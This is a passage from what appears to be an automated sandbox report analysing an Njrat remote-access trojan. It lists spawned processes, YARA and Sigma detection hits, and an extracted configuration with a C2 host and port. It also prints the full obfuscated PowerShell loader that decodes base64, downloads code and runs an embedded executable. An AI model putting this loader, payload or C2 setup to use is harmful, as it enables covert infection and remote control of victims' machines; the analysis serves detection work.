?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? B?? ?? ?? ?? ?? Y?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? E?? ?? ?? ?? w?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? BI?? ?? ?? ?? WE?? ?? ?? DwD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DwDN?? ?? ?? ?? FY?? UwBf?? FY?? RQBS?? FM?? SQBP?? E4?? XwBJ?? E4?? RgBP?? ?? ?? ?? ?? ?? C9BO/+?? ?? ?? B?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? /?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? R?? ?? ?? ?? ?? E?? VgBh?? HI?? RgBp?? Gw?? ZQBJ?? G4?? ZgBv?? ?? ?? ?? ?? ?? ?? k?? ?? Q?? ?? ?? BU?? HI?? YQBu?? HM?? b?? Bh?? HQ?? aQBv?? G4?? ?? ?? ?? ?? ?? ?? ?? ?? s?? Sc?? g?? ?? ?? QBT?? HQ?? cgBp?? G4?? ZwBG?? Gk?? b?? Bl?? Ek?? bgBm?? G8?? ?? ?? B4?? g?? ?? ?? Q?? w?? D?? ?? M?? ?? w?? D?? ?? N?? Bi?? D?? ?? ?? ?? ?? q?? ?? k?? ?? QBD?? G8?? bQBt?? GU?? bgB0?? HM?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DI?? CQ?? B?? EM?? bwBt?? H?? ?? YQBu?? Hk?? TgBh?? G0?? ZQ?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? 6?? ?? k?? ?? QBG?? Gk?? b?? Bl?? EQ?? ZQBz?? GM?? cgBp?? H?? ?? d?? Bp?? G8?? bg?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? w?? ?? g?? ?? QBG?? Gk?? b?? Bl?? FY?? ZQBy?? HM?? aQBv?? G4?? ?? ?? ?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 6?? ?? 0?? ?? QBJ?? G4?? d?? Bl?? HI?? bgBh?? Gw?? TgBh?? G0?? ZQ?? ?? ?? Gw?? c?? BP?? FU?? c?? Bs?? E0?? c?? ?? u?? GQ?? b?? Bs?? ?? ?? ?? ?? ?? BI?? BI?? ?? QBM?? GU?? ZwBh?? Gw?? QwBv?? H?? ?? eQBy?? Gk?? ZwBo?? HQ?? ?? ?? BD?? G8?? c?? B5?? HI?? aQBn?? Gg?? d?? ?? g?? Kk?? I?? ?? g?? DI?? M?? ?? y?? DI?? ?? ?? ?? q?? ?? E?? ?? QBM?? GU?? ZwBh?? Gw?? V?? By?? GE?? Z?? Bl?? G0?? YQBy?? Gs?? cw?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EI?? DQ?? B?? E8?? cgBp?? Gc?? aQBu?? GE?? b?? BG?? Gk?? b?? Bl?? G4?? YQBt?? GU?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBk?? Gw?? b?? ?? ?? ?? ?? ?? ?? Mg?? J?? ?? E?? U?? By?? G8?? Z?? B1?? GM?? d?? BO?? GE?? bQBl?? ?? ?? ?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DQ?? C?? ?? B?? F?? ?? cgBv?? GQ?? dQBj?? HQ?? VgBl?? HI?? cwBp?? G8?? bg?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 4?? ?? g?? ?? QBB?? HM?? cwBl?? G0?? YgBs?? Hk?? I?? BW?? GU?? cgBz?? Gk?? bwBu?? ?? ?? ?? MQ?? u?? D?? ?? Lg?? w?? C4?? M?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? w?? ?? ?? M?? ?? ?? ?? BDo?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Njrat

{"Host": "venomsi.mypsx.net", "Port": "81", "Mutex Name": "4c6c9a1bbdc34e6ebe", "Network Seprator": "@!#&^%$", "Campaign ID": "NYAN CAT", "Version": "0.7NC"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.355723069.000002165D9D2000.00000004.00000800.00020000.00000000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x211a7:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000010.00000002.355709733.000002165D9B2000.00000004.00000800.00020000.00000000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x1116f:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000010.00000002.354839665.000002164DEDA000.00000004.00000800.00020000.00000000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x8eaf:$s5: AEAAAAMAAQqVT 0x8e20:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000010.00000002.354821380.000002164DEC5000.00000004.00000800.00020000.00000000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x888f:$s5: AEAAAAMAAQqVT 0x8d4b:$s5: AEAAAAMAAQqVT 0x8800:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x8cbc:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x216d6:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLAgent09	Detects known downloader agent	ditekSHen	0x1558:$h1: //:ptth 0x1105:$s1: DownloadString 0xe5b:$s2: StrReverse 0x10f4:$s3: FromBase64String 0x1494:$s4: WebClient
Process Memory Space: powershell.exe PID: 6844	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x97b36:$b2: ::FromBase64String( 0xa4132:$s1: -join 0x108859:$s1: -join 0x3db:$s3: reverse 0x704:$s3: reverse 0xe92:$s3: reverse 0x162f:$s3: reverse 0x2e7a:$s3: reverse 0x3294:$s3: reverse 0x3ddc:$s3: reverse 0x4a4a:$s3: reverse 0x2da2d:$s3: reverse 0x343b4:$s3: reverse 0x364e9:$s3: reverse 0x40f1b:$s3: reverse 0x7cc32:$s3: reverse 0x88291:$s3: reverse 0x95a0a:$s3: Reverse 0xe1dcb:$s3: reverse 0xe9ef9:$s3: reverse 0x2b79b:$s4: +=
Process Memory Space: powershell.exe PID: 5608	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1435b6:$sa2: -encodedCommand 0x1435e2:$sa2: -encodedCommand 0x143cc9:$sa2: -EncodedCommand 0x1447d0:$sa2: -EncodedCommand 0x14486b:$sa2: -encodedCommand 0x320dd:$sb3: -windowstyle hidden 0x349dc:$sb3: -windowstyle hidden 0x34a5d:$sb3: -windowstyle hidden 0x375b3:$sb3: -windowstyle hidden 0x37b1d:$sb3: -windowstyle hidden 0x653f9:$sb3: -windowstyle hidden 0x65963:$sb3: -windowstyle hidden 0x7137e:$sb3: -windowstyle hidden 0x746ea:$sb3: -windowstyle hidden 0x74cf4:$sb3: -windowstyle hidden 0x781fa:$sb3: -windowstyle hidden 0x7d5c8:$sb3: -windowstyle hidden 0x7d656:$sb3: -windowstyle hidden 0x83d60:$sb3: -windowstyle hidden 0x8435f:$sb3: -windowstyle hidden 0xd782e:$sb3: -windowstyle hidden
Process Memory Space: powershell.exe PID: 5608	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4fa:$b2: ::FromBase64String( 0x18934:$b2: ::FromBase64String( 0x3053c:$b2: ::FromBase64String( 0x32a75:$b2: ::FromBase64String( 0x32f2a:$b2: ::FromBase64String( 0x35b01:$b2: ::FromBase64String( 0x37abc:$b2: ::FromBase64String( 0x38599:$b2: ::FromBase64String( 0x3c5b0:$b2: ::FromBase64String( 0x63947:$b2: ::FromBase64String( 0x65902:$b2: ::FromBase64String( 0x6606c:$b2: ::FromBase64String( 0x6f0eb:$b2: ::FromBase64String( 0x6f4ef:$b2: ::FromBase64String( 0x71c2e:$b2: ::FromBase64String( 0x72c38:$b2: ::FromBase64String( 0x74c93:$b2: ::FromBase64String( 0x751fd:$b2: ::FromBase64String( 0x75fbf:$b2: ::FromBase64String( 0x76748:$b2: ::FromBase64String( 0x7d25f:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 5876	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1605f9:$sa2: -encodedCommand 0x160625:$sa2: -encodedCommand 0x160d06:$sa2: -EncodedCommand 0x16180d:$sa2: -EncodedCommand 0x1618a8:$sa2: -encodedCommand 0x3443:$sb3: -windowstyle hidden 0x54f4:$sb3: -windowstyle hidden 0x477dc:$sb3: -windowstyle hidden 0x651f9:$sb3: -windowstyle hidden 0x66df0:$sb3: -windowstyle hidden 0xa2acd:$sb3: -windowstyle hidden 0xa4759:$sb3: -windowstyle hidden 0xa47e4:$sb3: -windowstyle hidden 0x1054ef:$sb3: -windowstyle hidden 0x1550e4:$sb3: -windowstyle hidden 0x159a92:$sb3: -windowstyle hidden 0x18a0f1:$sb3: -windowstyle hidden 0x18be36:$sb3: -windowstyle hidden 0x19a012:$sb3: -windowstyle hidden 0x1d2f7a:$sb3: -windowstyle hidden 0x1e105f:$sb3: -windowstyle hidden
Process Memory Space: powershell.exe PID: 5876	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x46236:$s5: AEAAAAMAAQqVT 0xad859:$s5: AEAAAAMAAQqVT 0xb6716:$s5: AEAAAAMAAQqVT 0xc8b87:$s5: AEAAAAMAAQqVT 0xc9028:$s5: AEAAAAMAAQqVT 0x11067:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1ec44:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x461a7:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x7180e:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0xad7ca:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0xb6687:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0xc8af8:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0xc8f99:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x197076:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: powershell.exe PID: 5876	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: powershell.exe PID: 5876	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4f06:$b2: ::FromBase64String( 0x7b57:$b2: ::FromBase64String( 0x4929f:$b2: ::FromBase64String( 0x49712:$b2: ::FromBase64String( 0x49862:$b2: ::FromBase64String( 0x4b559:$b2: ::FromBase64String( 0x4bae0:$b2: ::FromBase64String( 0x66cbf:$b2: ::FromBase64String( 0x76591:$b2: ::FromBase64String( 0xa4590:$b2: ::FromBase64String( 0xe1207:$b2: ::FromBase64String( 0xea183:$b2: ::FromBase64String( 0xecbc9:$b2: ::FromBase64String( 0x107415:$b2: ::FromBase64String( 0x10ab3b:$b2: ::FromBase64String( 0x12be99:$b2: ::FromBase64String( 0x15700a:$b2: ::FromBase64String( 0x15b558:$b2: ::FromBase64String( 0x170ee3:$b2: ::FromBase64String( 0x188f72:$b2: ::FromBase64String( 0x18bbb5:$b2: ::FromBase64String(
Process Memory Space: RegSvcs.exe PID: 3016	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.powershell.exe.21665e70000.3.raw.unpack	MALWARE_Win_DLAgent09	Detects known downloader agent	ditekSHen	0x1558:$h1: //:ptth 0x1105:$s1: DownloadString 0xe5b:$s2: StrReverse 0x10f4:$s3: FromBase64String 0x1494:$s4: WebClient
16.2.powershell.exe.2164dccfa28.0.raw.unpack	MALWARE_Win_DLAgent09	Detects known downloader agent	ditekSHen	0x1558:$h1: //:ptth 0x15c4bc:$h1: //:ptth 0x1105:$s1: DownloadString 0x15dbd4:$s1: DownloadString 0xe5b:$s2: StrReverse 0x10f4:$s3: FromBase64String 0x1494:$s4: WebClient

Sigma Signatures

System Summary

Sigma detected: Encoded FromBase64String

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ??

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? 